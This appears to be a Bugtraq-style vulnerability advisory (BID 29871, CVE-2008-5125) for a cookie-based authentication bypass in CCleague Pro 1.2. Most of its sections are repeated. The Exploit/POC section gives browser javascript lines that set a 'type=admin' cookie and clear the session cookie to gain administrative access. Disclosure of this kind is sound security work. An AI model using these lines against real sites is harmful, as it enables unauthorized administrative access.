CCleague Pro 'type' Cookie Parameter Authentication Bypass Vulnerability
BID:29871
Info
CCleague Pro 'type' Cookie Parameter Authentication Bypass Vulnerability
| Bugtraq ID: | 29871 |
| Class: | Access Validation Error |
| CVE: |
CVE-2008-5125 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 21 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | t0pP8uZz |
| Vulnerable: |
CCleague Pro CCleague Pro 1.2 |
| Not Vulnerable: | |
Discussion
CCleague Pro 'type' Cookie Parameter Authentication Bypass Vulnerability
CCleague Pro is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
CCleague Pro 1.2 and prior versions are vulnerable.
CCleague Pro is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
CCleague Pro 1.2 and prior versions are vulnerable.
Exploit / POC
CCleague Pro 'type' Cookie Parameter Authentication Bypass Vulnerability
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "type=admin; path=/"; document.cookie = "PHPSESSID=; path=/";
javascript:document.cookie = "[email protected]; path=/";
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "type=admin; path=/"; document.cookie = "PHPSESSID=; path=/";
javascript:document.cookie = "[email protected]; path=/";
Solution / Fix
CCleague Pro 'type' Cookie Parameter Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
CCleague Pro 'type' Cookie Parameter Authentication Bypass Vulnerability
References:
References:
- CCleague Pro (Orlando L. Castillo)